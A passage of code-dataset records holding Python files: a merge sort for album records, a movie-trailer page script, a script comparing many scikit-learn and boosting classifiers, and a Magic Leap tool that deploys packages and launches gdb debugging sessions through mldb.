Tracks\":\n while i < n1 and j < n2:\n if X[i].albumNumTracks <= Y[j].albumNumTracks:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # When we run out of elements in either X or Y append the remaining elements\n while i < n1:\n array[k] = X[i]\n i += 1\n k += 1\n while j < n2:\n array[k] = Y[j]\n j += 1\n k += 1","repo_name":"Anthony42540/RecordRackDSA","sub_path":"MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"28677991792","text":"import webbrowser\nimport fresh_tomatoes\nimport media\n\ntoystory = media.Movie(\"Toy Story\",\n \"A story of a boy whose toys came back to life\",\n \"http://www.gstatic.com/tv/thumb/movieposters/17420/p17420_p_v8_ab.jpg\",\n \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\nskyfall = media.Movie(\"Skyfall\",\n \"Skyfall is the 23rd James Bond film produced by Eon Productions and released in 2012. 
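The four merge loops above differ only in which attribute they compare; a hedged refactor sketch that collapses them behind a key function (it returns a new list rather than sorting in place, and the attribute names are taken from the original):

def merge_sort(items, key):
    # Top-down merge sort; `key` extracts the attribute to compare on,
    # so one function covers all four orderings above.
    if len(items) <= 1:
        return items
    mid = len(items) // 2
    left = merge_sort(items[:mid], key)
    right = merge_sort(items[mid:], key)
    merged = []
    i = j = 0
    while i < len(left) and j < len(right):
        if key(left[i]) <= key(right[j]):
            merged.append(left[i])
            i += 1
        else:
            merged.append(right[j])
            j += 1
    merged.extend(left[i:])
    merged.extend(right[j:])
    return merged

# e.g. albums = merge_sort(albums, key=lambda a: a.albumName)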
\"\n \"It features Daniel Craig in his third performance as James Bond\",\n \"http://t2.gstatic.com/images?q=tbn:ANd9GcTSNSk0M1z_CZ1UKTnfE2nHmk4Oxqh_gKO0dAHZHwrfLX6D9Y4s\",\n \"https://www.youtube.com/watch?v=6kw1UVovByw\")\n\nsecretlifeofpets = media.Movie(\"The Secret Life of Pets\",\n \"The quiet life of a terrier named Max is upended when his owner takes in Duke, \"\n \"a stray whom Max instantly dislikes.\",\n \"https://upload.wikimedia.org/wikipedia/en/6/64/The_Secret_Life_of_Pets_poster.jpg\",\n \"https://www.youtube.com/watch?v=eWI_Jsw9qUs\")\n\ninception = media.Movie(\"Inception\",\n \"Inception is a 2010 science fiction heist thriller film written, co-produced, \"\n \"and directed by Christopher Nolan, and co-produced by Emma Thomas.\",\n \"http://t2.gstatic.com/images?q=tbn:ANd9GcRo9vfJCM6dzPkZHIHBVCtlJnAnew9Ai26kEdrli0-tfmatmciD\",\n \"https://www.youtube.com/watch?v=66TuSJo4dZM\")\n\nmovies = [toystory,skyfall,secretlifeofpets,inception]\nfresh_tomatoes.open_movies_page(movies)","repo_name":"lowhng/movie_web","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1678862558","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom xgboost import XGBClassifier\nfrom xgboost import XGBRFClassifier\nfrom lightgbm import LGBMClassifier\nfrom catboost import CatBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.naive_bayes import MultinomialNB, BernoulliNB\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.neural_network import MLPClassifier\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import roc_auc_score\n\n\nclass Classification:\n\n def __init__(self, model, train_data, test_data, train_target, test_target):\n self.model = model\n self.train_data = train_data\n self.test_data = test_data\n self.train_target = train_target\n self.test_target = test_target\n\n def fit_predict(self):\n self.model.fit(self.train_data, self.train_target)\n self.y_pred = self.model.predict(self.test_data)\n\n return accuracy_score(self.test_target, self.y_pred)\n\n def classification_models(x_train, x_test, y_train, y_test):\n models_output_list = []\n\n #! logistic\n model_lr = LogisticRegression(max_iter=990)\n\n model_lr.fit(x_train, y_train)\n y_pred_lr = model_lr.predict(x_test)\n models_output_list.append(\n [\n \"LogisticRegression\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_lr),\n \"precision_score\",\n precision_score(y_test, y_pred_lr),\n \"f1_score\",\n f1_score(y_test, y_pred_lr),\n \"recall_score\",\n recall_score(y_test, y_pred_lr),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_lr),\n ],\n ]\n )\n\n #! 
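The media module imported above is not part of this file; a plausible minimal reconstruction is sketched below. The attribute names are assumptions inferred from the four constructor arguments used above, not the repository's actual media.py.

# media.py -- hypothetical reconstruction; only the four constructor
# arguments used above are modeled.
import webbrowser

class Movie:
    def __init__(self, title, storyline, poster_image_url, trailer_youtube_url):
        self.title = title
        self.storyline = storyline
        self.poster_image_url = poster_image_url
        self.trailer_youtube_url = trailer_youtube_url

    def show_trailer(self):
        # Open the trailer in the default browser.
        webbrowser.open(self.trailer_youtube_url)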
KNeighborsClassifier\n model_knnc = KNeighborsClassifier()\n\n model_knnc.fit(x_train, y_train)\n y_pred_knnc = model_knnc.predict(x_test)\n models_output_list.append(\n [\n \"KNeighborsClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_knnc),\n \"precision_score\",\n precision_score(y_test, y_pred_knnc),\n \"f1_score\",\n f1_score(y_test, y_pred_knnc),\n \"recall_score\",\n recall_score(y_test, y_pred_knnc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_knnc),\n ],\n ]\n )\n #! DecisionTreeClassifier\n model_dtc = DecisionTreeClassifier()\n\n model_dtc.fit(x_train, y_train)\n y_pred_dtc = model_dtc.predict(x_test)\n models_output_list.append(\n [\n \"DecisionTreeClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_dtc),\n \"precision_score\",\n precision_score(y_test, y_pred_dtc),\n \"f1_score\",\n f1_score(y_test, y_pred_dtc),\n \"recall_score\",\n recall_score(y_test, y_pred_dtc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_dtc),\n ],\n ]\n )\n #! SVC\n model_svc = SVC()\n\n model_svc.fit(x_train, y_train)\n y_pred_svc = model_svc.predict(x_test)\n models_output_list.append(\n [\n \"SVC\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_svc),\n \"precision_score\",\n precision_score(y_test, y_pred_svc),\n \"f1_score\",\n f1_score(y_test, y_pred_svc),\n \"recall_score\",\n recall_score(y_test, y_pred_svc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_svc),\n ],\n ]\n )\n #! RandomForestClassifier\n model_rfc = RandomForestClassifier(random_state=42)\n\n model_rfc.fit(x_train, y_train)\n y_pred_rfc = model_rfc.predict(x_test)\n models_output_list.append(\n [\n \"RandomForestClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_rfc),\n \"precision_score\",\n precision_score(y_test, y_pred_rfc),\n \"f1_score\",\n f1_score(y_test, y_pred_rfc),\n \"recall_score\",\n recall_score(y_test, y_pred_rfc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_rfc),\n ],\n ]\n )\n #! GradientBoostingClassifier\n model_gbc = GradientBoostingClassifier()\n\n model_gbc.fit(x_train, y_train)\n y_pred_gbc = model_gbc.predict(x_test)\n models_output_list.append(\n [\n \"GradientBoostingClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_gbc),\n \"precision_score\",\n precision_score(y_test, y_pred_gbc),\n \"f1_score\",\n f1_score(y_test, y_pred_gbc),\n \"recall_score\",\n recall_score(y_test, y_pred_gbc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_gbc),\n ],\n ]\n )\n #! XGBClassifier\n model_xgbc = XGBClassifier()\n\n model_xgbc.fit(x_train, y_train)\n y_pred_xgbc = model_xgbc.predict(x_test)\n models_output_list.append(\n [\n \"XGBClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_xgbc),\n \"precision_score\",\n precision_score(y_test, y_pred_xgbc),\n \"f1_score\",\n f1_score(y_test, y_pred_xgbc),\n \"recall_score\",\n recall_score(y_test, y_pred_xgbc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_xgbc),\n ],\n ]\n )\n #! XGBRFClassifier\n model_xgbrfc = XGBRFClassifier()\n\n model_xgbrfc.fit(x_train, y_train)\n y_pred_xgbrfc = model_xgbrfc.predict(x_test)\n models_output_list.append(\n [\n \"XGBRFClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_xgbrfc),\n \"precision_score\",\n precision_score(y_test, y_pred_xgbrfc),\n \"f1_score\",\n f1_score(y_test, y_pred_xgbrfc),\n \"recall_score\",\n recall_score(y_test, y_pred_xgbrfc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_xgbrfc),\n ],\n ]\n )\n #! 
LGBMClassifier\n model_lgbmc = LGBMClassifier()\n\n model_lgbmc.fit(x_train, y_train)\n y_pred_lgbmc = model_lgbmc.predict(x_test)\n models_output_list.append(\n [\n \"LGBMClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_lgbmc),\n \"precision_score\",\n precision_score(y_test, y_pred_lgbmc),\n \"f1_score\",\n f1_score(y_test, y_pred_lgbmc),\n \"recall_score\",\n recall_score(y_test, y_pred_lgbmc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_lgbmc),\n ],\n ]\n )\n #! CatBoostClassifier\n model_cbc = CatBoostClassifier(verbose=False)\n\n model_cbc.fit(x_train, y_train)\n y_pred_cbc = model_cbc.predict(x_test)\n models_output_list.append(\n [\n \"CatBoostClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_cbc),\n \"precision_score\",\n precision_score(y_test, y_pred_cbc),\n \"f1_score\",\n f1_score(y_test, y_pred_cbc),\n \"recall_score\",\n recall_score(y_test, y_pred_cbc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_cbc),\n ],\n ]\n )\n\n #! GaussianNB\n model_gnb = GaussianNB()\n\n model_gnb.fit(x_train, y_train)\n y_pred_gnb = model_gnb.predict(x_test)\n models_output_list.append(\n [\n \"GaussianNB\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_gnb),\n \"precision_score\",\n precision_score(y_test, y_pred_gnb),\n \"f1_score\",\n f1_score(y_test, y_pred_gnb),\n \"recall_score\",\n recall_score(y_test, y_pred_gnb),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_gnb),\n ],\n ]\n )\n\n #! MLPClassifier\n model_mlpc = MLPClassifier()\n\n model_mlpc.fit(x_train, y_train)\n y_pred_mlpc = model_mlpc.predict(x_test)\n models_output_list.append(\n [\n \"MLPClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_mlpc),\n \"precision_score\",\n precision_score(y_test, y_pred_mlpc),\n \"f1_score\",\n f1_score(y_test, y_pred_mlpc),\n \"recall_score\",\n recall_score(y_test, y_pred_mlpc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_mlpc),\n ],\n ]\n )\n\n highest_acs_output = [None, 0]\n highest_prs_output = [None, 0]\n highest_f1s_output = [None, 0]\n highest_rcs_output = [None, 0]\n highest_rocs_output = [None, 0]\n for a in range(len(models_output_list)):\n for b in range(10):\n if b == 1:\n output_acs_value = models_output_list[a][1][1]\n if output_acs_value > highest_acs_output[1]:\n highest_acs_output[0] = models_output_list[a][0]\n highest_acs_output[1] = output_acs_value\n\n if b == 3:\n output_prs_value = models_output_list[a][1][3]\n if output_prs_value > highest_prs_output[1]:\n highest_prs_output[0] = models_output_list[a][0]\n highest_prs_output[1] = output_prs_value\n if b == 5:\n output_f1s_value = models_output_list[a][1][5]\n if output_f1s_value > highest_f1s_output[1]:\n highest_f1s_output[0] = models_output_list[a][0]\n highest_f1s_output[1] = output_f1s_value\n if b == 7:\n output_rcs_value = models_output_list[a][1][7]\n if output_rcs_value > highest_rcs_output[1]:\n highest_rcs_output[0] = models_output_list[a][0]\n highest_rcs_output[1] = output_rcs_value\n if b == 9:\n output_rocs_value = models_output_list[a][1][9]\n if output_rocs_value > highest_rocs_output[1]:\n highest_rocs_output[0] = models_output_list[a][0]\n highest_rocs_output[1] = output_rocs_value\n return (\n models_output_list,\n highest_acs_output,\n highest_f1s_output,\n highest_prs_output,\n highest_rcs_output,\n highest_rocs_output,\n 
)\n","repo_name":"fawern/machine_learning_libraries","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":12659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11160897400","text":"import argparse\nimport logging\nimport mldb\nimport os\nimport subprocess\nimport sys\nfrom sys import stdout\nimport zipfile\nimport xml.etree.ElementTree as ET\nimport re\nimport json\nimport time\nimport shutil\nimport tempfile\n\n\ndef log(msg):\n logger = logging.getLogger(__name__)\n logger.info(msg)\n\n\ndef error(msg):\n sys.exit(\"ERROR: {}\".format(msg))\n\n\ndef _extract_package_name_manifest(manifest_content):\n \"\"\" Parse a manifest xml file and return the package name. \"\"\"\n manifest = ET.fromstring(manifest_content)\n return manifest.get(\"{magicleap}package\")\n\n\ndef _extract_package_name(package):\n \"\"\" Extract (in memory) the manifest.xml from a package and return the package name. \"\"\"\n try:\n with zipfile.ZipFile(package, 'r') as zin:\n for item in zin.infolist():\n if item.filename == 'manifest.xml':\n manifest_content = zin.read(item.filename)\n return _extract_package_name_manifest(manifest_content)\n except Exception as ex:\n error(\"Failed extract package name from '%s' because of %s\" % (package, str(ex)))\n\n error(\"package %s does not contain mandatory manifest.xml\" % package)\n\n\ndef _host_is_windows():\n return sys.platform.startswith(\"win\")\n\n\nclass ArgumentParser(mldb.ArgumentParser):\n DESCRIPTION = \"\"\"\nLaunches a Magic Leap application in gdb\n\nExample usage:\n To deploy, launch and debug mpk:\n debug --deploy-mpk ~/myproj/.out/myproj/com.acme.myproj.mpk ~/myproj/.out/debug_lumin_clang-3.8_aarch64/myexe\n\n To launch and debug already deployed app:\n debug --package com.acme.myproj ~/myproj/.out/debug_lumin_clang-3.8_aarch64/myexe\n\n To debug already running app:\n debug --attach --package com.acme.myproj ~/myproj/.out/debug_lumin_clang-3.8_aarch64/myexe\n\n\nNote:\n - you will see some noise regarding SIGSTOP at the outset of the debug session. This\n is a consequence of how the platform launches the application for debugging. It\n will not affect either the application or your ability to debug it.\n\"\"\"\n\n def __init__(self):\n super(ArgumentParser, self).__init__(description=self.DESCRIPTION)\n\n required_group = self.add_argument_group(\"required options\")\n required_group.add_argument(\n dest=\"program\",\n help=\"Executable file. 
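The twelve near-identical training blocks above differ only in the estimator; a hedged refactor sketch that computes the same five metrics in one loop and picks the best model per metric over all entries (binary labels assumed, as in the original; the model dictionary is illustrative, not the full set):

from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import (accuracy_score, precision_score, f1_score,
                             recall_score, roc_auc_score)

METRICS = (accuracy_score, precision_score, f1_score, recall_score, roc_auc_score)

def evaluate_models(models, x_train, x_test, y_train, y_test):
    results = {}
    for name, model in models.items():
        model.fit(x_train, y_train)
        y_pred = model.predict(x_test)
        results[name] = {m.__name__: m(y_test, y_pred) for m in METRICS}
    # Best model per metric, iterating over all entries rather than a
    # hard-coded index range.
    best = {m.__name__: max(results, key=lambda n: results[n][m.__name__])
            for m in METRICS}
    return results, best

# results, best = evaluate_models(
#     {'lr': LogisticRegression(max_iter=990), 'rf': RandomForestClassifier()},
#     x_train, x_test, y_train, y_test)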
Should contain debug info or a link to a sym file.\\nThis argument should not be a pure sym file\")\n\n # The --deploy option is deprecated in favor of --deploy-mpk\n # It is supported in order to maintain backward compatibility\n self.add_argument(\n \"--deploy\", action=\"store_true\",\n help=argparse.SUPPRESS)\n\n self.add_argument(\n \"--verbose\", \"-v\", action=\"store_true\",\n help=\"enable verbose mode\")\n\n debug_group = self.add_argument_group(\"optional debugging options\")\n debug_group.add_argument(\n \"--deploy-mpk\", dest=\"deploy_mpk\",\n help=\"deploy the application package (mpk) to the device\")\n\n debug_group.add_argument(\n \"--force\", action=\"store_true\",\n help=\"kill existing debug session if it exists\")\n\n debug_group.add_argument(\n \"--attach\", action='store_true',\n help=\"attach to the running process\")\n\n debug_group.add_argument(\n \"--env\", action='append',\n help=\"pass an environment variable to a debuggable application\")\n\n debug_group.add_argument(\n \"--setup-only\", dest=\"setup_only\", action='store_true',\n help=\"create GDB command file and launch gdbserver on the device, but don't launch GDB client\")\n\n debug_group.add_argument(\n \"--port\", dest=\"port\", type=int, default=\"7777\",\n help=\"override port used on the host. Default is 7777\")\n\n debug_group.add_argument(\n \"-x\", \"--exec\", dest=\"gdb_cmd_file\",\n help=\"file containing gdb commands to run after establishing connection\")\n\n debug_group.add_argument(\n \"-p\", \"--package\", dest=\"package\",\n help=\"package name\")\n\n debug_group.add_argument(\n \"--sopaths\", dest=\"sopaths\",\n help=\"list of paths to shared libraries you want to debug. The list should be separated by colon (:) on Linux and MacOS or semicolon (;) on Windows.\")\n\n debug_group.add_argument(\n \"-c\", \"--component\", dest=\"component\",\n help=\"application component. 
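_extract_package_name above reads one XML member straight out of a zip archive without extracting it; the same pattern, generalized (the file and attribute names in the usage comment are just the ones used above):

import zipfile
import xml.etree.ElementTree as ET

def read_zip_xml_attribute(archive_path, member, attribute):
    # Read one XML member out of an archive without extracting it to disk,
    # then return a single attribute of the root element (None if absent).
    with zipfile.ZipFile(archive_path) as zf:
        root = ET.fromstring(zf.read(member))
    return root.get(attribute)

# e.g. read_zip_xml_attribute('app.mpk', 'manifest.xml', '{magicleap}package')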
Defaults to first component in manifest.xml if not specified\")\n\n if _host_is_windows():\n tui_help = argparse.SUPPRESS\n no_console_help = \"start gdb in main window\"\n else:\n tui_help = \"use GDB's tui mode\"\n no_console_help = argparse.SUPPRESS\n\n debug_group.add_argument(\n \"-t\", \"--tui\", action=\"store_true\", dest=\"tui\",\n help=tui_help)\n\n debug_group.add_argument(\n \"--no_console\", action=\"store_true\",\n help=no_console_help)\n\n debug_group.add_argument(\n \"-i\", \"--init_str\", dest=\"init_str\",\n help=\"application initialization string\")\n\n\ndef _tools_path():\n # path of debug.py: tools/debug/debug.py\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), '..')\n\n\ndef gdb_bin_path():\n return os.path.join(_tools_path(), 'toolchains', 'bin')\n\n\ndef handle_args():\n args = ArgumentParser().parse_args()\n\n if args.tui and _host_is_windows():\n error(\"TUI is unsupported on Windows.\")\n\n if not os.path.isfile(args.program):\n error(\"File not found: '{}'.\".format(args.program))\n\n if args.verbose:\n logger = logging.getLogger(__name__)\n handler = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter()\n\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.propagate = False\n\n logger.setLevel(logging.INFO)\n\n return args\n\n\n# download a file from device to host.\ndef download_file(args, device_path, host_path, pkg_name):\n device = args.device\n return device.pull(device_path, host_path, package=pkg_name)\n\n\n# Check if the device is running Lumin OS build before the given id.\n# helper for allowing compatibility code to address issues in older devices\ndef _lumin_version_before(device, lumin_nightly_build_id):\n\n device_version = device.get_prop(\"ro.build.id\")\n # Recognize the \"N03.123\" nightly build pattern, treat anything else as new.\n m = re.match(\"^N03.([0-9]+)$\", device_version)\n return m and int(m.group(1)) < lumin_nightly_build_id\n\n\ndef _get_continue_cmd(args):\n if args.attach or args.setup_only:\n # Not needed for an attach setup or \"--setup-only\" launch (Visual Studio debug)\n return \"\"\n\n if _lumin_version_before(args.device, 112):\n # Compatibility with devices before N03.112, did not use attach for debug.\n return \"\"\n\n # To debug the application from the beginning, \"mldb start -d\" sends a SIGSTOP\n # to the application so that when gdbserver attaches, the app is still at the beginning.\n # This signal causes that 3 gdb continue operations are needed to resume it initially,\n # more precisely one continue and one \"signal 0\" (which ignores the SIGSTOP) also works,\n # but as we want the target to still be suspended when the user starts his session,\n # we do 2 continues at startup.\n return \"gdb.execute('continue')\\ngdb.execute('continue')\\n\"\n\n\ndef generate_gdb_command_file(args, sysroot, sopaths, src_search_path):\n base_path = os.path.join(os.path.dirname(args.program), os.path.basename(args.program))\n base_path = base_path.replace(\"\\\\\", \"/\")\n if sopaths is None:\n sopaths = sysroot\n if src_search_path is None:\n src_search_path = sysroot # unlikely to help but worth a try\n\n continue_cmd = _get_continue_cmd(args)\n\n gdb_commands = \"\"\"\nset osabi GNU/Linux\nset debug aarch64\nset history save on\nset history filename {base_path}.gdb_history\n\n# Set this so that gdb can find the shared library files on host. 
Those files\n# usually contain symbol data (debug and/or symbol table).\nset solib-search-path {sopaths}\n\n# Sysroot provides a mapping for where to look for a loaded library on the host. \n# If the program loads /some/dir/libfoo.so and sysroot is c:\\mysrc, then gdb \n# will look for the file at c:\\mysrc\\some\\dir\\libfoo.so. When sysroot is not\n# set, gdb transfers the file up through gdbserver. This is wasteful if you have\n# the library on the host already.\nset sysroot {sysroot}\n\n# Set this so that gdb can find the source files if the paths in the debug info\n# aren't absolute or don't accurately reflect where the files are on host\ndirectory {directory}\n\npython\n\n# Python 2.7 compatibility\nfrom __future__ import print_function\n# Set up the pretty printer\nimport sys\nsys.path.append(\"{pypr_dir}\")\nfrom printers import register_libcxx_printers\nregister_libcxx_printers(None)\n\n# Try to connect for a few seconds, sometimes the device gdbserver takes\n# a little bit to come up.\ndef target_remote_with_retry(target, timeout_seconds):\n import time\n end_time = time.time() + timeout_seconds\n while True:\n try:\n gdb.execute('target remote ' + target)\n return True\n except gdb.error as e:\n time_left = end_time - time.time()\n if time_left < 0 or time_left > timeout_seconds:\n print(\"Error: unable to connect to device.\", file=sys.stderr)\n print(e, file=sys.stderr)\n return False\n time.sleep(min(0.25, time_left))\n\ntarget_remote_with_retry(':{port}', {connect_timeout})\n{continue_cmd}\nend\n\"\"\".format(base_path=base_path,\n sysroot=sysroot,\n sopaths=sopaths,\n directory=src_search_path,\n pypr_dir=args.pypr_dir.replace(\"\\\\\", \"/\"),\n port=args.port,\n connect_timeout=10,\n continue_cmd=continue_cmd)\n\n # Append the contents of the user's optional gdb command file\n if args.gdb_cmd_file is not None:\n try:\n user_cmd_file = open(args.gdb_cmd_file, \"r\")\n except IOError:\n error(\"Failed to open GDB command file: '{}'.\".format(args.gdb_cmd_file))\n\n with user_cmd_file:\n gdb_commands += user_cmd_file.read()\n\n # Write out the command file\n gen_cmd_file = os.path.join(base_path + '.gdbinit')\n log(\"Generating GDB command file \" + gen_cmd_file)\n\n with open(gen_cmd_file, \"w\") as f:\n f.write(gdb_commands)\n\n return gen_cmd_file\n\n\ndef start_gdb(gdb_path, program, command_file, gdb_flags=None, no_console=False):\n \"\"\"Start gdb in the background and block until it finishes.\n\n Args:\n gdb_path: Path of the gdb binary.\n program: Path of the program to debug.\n command_file: file name of the GDB script to run.\n gdb_flags: List of flags to append to gdb command.\n no_console: if True no separate console is created on Windows.\n \"\"\"\n\n gdb_args = [gdb_path, program, \"-x\", mldb.quote_path_if_needed(command_file)] + (gdb_flags or [])\n log(\"Starting GDB client... 
(\" + ' '.join(gdb_args) + \")\")\n\n kwargs = {}\n if _host_is_windows() and not no_console:\n kwargs[\"creationflags\"] = subprocess.CREATE_NEW_CONSOLE\n\n gdb_process = subprocess.Popen(gdb_args, **kwargs)\n while gdb_process.returncode is None:\n try:\n gdb_process.communicate()\n except KeyboardInterrupt:\n pass\n\n if gdb_process.returncode != 0:\n return_code_str = str(gdb_process.returncode)\n if gdb_process.returncode >= 0x80000000:\n return_code_str = hex(gdb_process.returncode)\n print(\"gdb failed (exit code %s)\" % return_code_str, file=sys.stderr)\n\n\ndef device_invocation(func, err_msg):\n \"\"\"\n Invokes [func] and catches subprocess.CalledProcessError, printing out the\n failure\n\n We use this for making calls to mldb where a user error is to be expected\n\n @param err_msg is the final error message to display (in addition to what's\n in the exception object)\n \"\"\"\n try:\n func()\n except subprocess.CalledProcessError as exc:\n print(\"ERROR: {}\\nERROR: {}\".format(str(exc), exc.output.decode('utf-8').strip()), file=sys.stderr)\n error(err_msg)\n\n\ndef _process_exists(device, pkg_name, component=None):\n out = device.ps(as_json=True)\n process_list = json.loads(out)\n for p in process_list:\n if p[\"package\"] != pkg_name:\n continue\n if component is None or p[\"component\"] == component:\n return True\n return False\n\n\ndef _terminate_application(device, pkg_name, component=None):\n \"\"\"\n Helper to terminate an application, if it is running.\n Allow to do this silently if it is not certain that the application is running.\n \"\"\"\n log(\"Terminating the %s application \" % pkg_name)\n try:\n device.terminate(pkg_name, component, force=True)\n # device.terminate is asynchronous, wait until device is not shown in mldb ps anymore\n for unused_retries in range(0, 20):\n if not _process_exists(device, pkg_name, component):\n break\n time.sleep(0.1) # 0.1 seconds, up to 2 seconds + processing time\n else:\n log(\"WARNING: %s still exists as process on target two seconds after a successful terminate request\" % pkg_name)\n\n except subprocess.CalledProcessError as exc:\n log(\"ERROR: {}\\nERROR: {}\".format(str(exc), exc.output.decode('utf-8').strip()))\n\n\ndef main():\n args = handle_args()\n device = args.device\n\n if device is None:\n error(\"mldb did not find any connected devices.\")\n\n mldb_version = mldb.version_str(device.mldb_cmd)\n log(\"MLDB command used: '{}'\".format(\" \".join(device.mldb_cmd)))\n log(\"MLDB version: {}\".format(\" \".join(mldb_version.splitlines())))\n\n pkg_name = None\n if args.attach:\n # Attach to running process\n if args.package is None:\n raise error(\"Must specify the package with --package.\")\n\n device_invocation(lambda: device.attach(args.package, host_port=args.port), \"Launch failed\")\n pkg_name = args.package\n else:\n # Launch application, possibly deploying first\n if args.deploy or args.deploy_mpk:\n if args.deploy_mpk:\n args_mpk = args.deploy_mpk\n else:\n args_mpk = args.package\n log(\"Deploying to device...\")\n # Package (mpk) installation\n if not os.path.isfile(args_mpk):\n error(\"File not found: '{}'.\".format(args_mpk))\n\n # Extract the package name from the manifest. We need it\n # for launching the\n package_name = _extract_package_name(args_mpk)\n\n # Do the install\n # This can be a long running operation (the package zip could be hundreds\n # of MBs), and mldb prints updates to stdout throughout the process. This\n # requires special handling for this mldb invocation. 
Typically we invoke\n # mldb, then print the output in bulk when the command completes. Here\n # we have to forward the stdout in realtime. Also, allow IDEs to reliably\n # find that output by printing markers before and after the operation.\n if args.verbose:\n print(\"=== INSTALL THROUGH MLDB: BEGIN ===\")\n last_line = \"\"\n\n def do_install():\n nonlocal last_line\n for line in device.install(args_mpk, replace=True, create_generator=True):\n # If the line contains the string 'Successfully' then the package has been installed and the line\n # should be printed on a new line. During the push of the package the progress report needs to\n # be displayed such that each line overwrites the previous line. By prefacing the string with the\n # '\\r' (Carriage Return) the cursor is returned to the beginning of the line and the next message\n # is printed over it. The print() function also must be passed \"end=''\" so that the New Line is not\n # printed. The standard output stream must be flushed in order for the last line to be output in\n # the console. (DTOOLS-2032)\n if not re.match(r'Successfully', line):\n print(\"\\r\" + line.strip(), end='')\n else:\n print(\"\\n\" + line.strip())\n last_line = line\n stdout.flush()\n device_invocation(do_install, \"Install failed\")\n\n if args.verbose:\n print(\"=== INSTALL THROUGH MLDB: END ===\")\n\n if not last_line.startswith(\"Successfully \"):\n error(\"mldb install printed unexpected output: \" + last_line)\n pkg_name = package_name\n else:\n pkg_name = args.package\n\n # Force all output out now. Fixes strange interleave output issue seen with test\n stdout.flush()\n\n # Workaround for launch -f not killing debugged application, stop it if it is already running.\n # Remove once issue is fixed.\n _terminate_application(device, pkg_name, args.component)\n\n device_invocation(lambda: device.launch(pkg_name, args.component, debug=True, host_port=args.port, env=args.env, init_str=args.init_str), \"Launch failed\")\n\n args.pypr_dir = os.path.join(\n gdb_bin_path(), \"..\", \"share\", \"pretty-printers\", \"libc++\", \"v1\")\n args.pypr_dir = os.path.realpath(args.pypr_dir) # canonicalize, for neatness\n if not os.path.isdir(args.pypr_dir):\n raise AssertionError(\"Malformed SDK. 
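The install loop above rewrites a single console line with '\r' while streaming progress; isolated from mldb, the technique looks like this (a generic sketch, not SDK code):

import sys
import time

def show_progress(steps):
    for i, label in enumerate(steps, start=1):
        # '\r' returns the cursor to column 0 so each write overdraws the
        # previous one; end='' holds back the newline until we are done.
        print("\r[%d/%d] %s" % (i, len(steps), label), end='')
        sys.stdout.flush()
        time.sleep(0.1)  # stand-in for real work
    print()  # finish with a newline, like the 'Successfully' branch above

# show_progress(['connecting', 'pushing package', 'verifying'])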
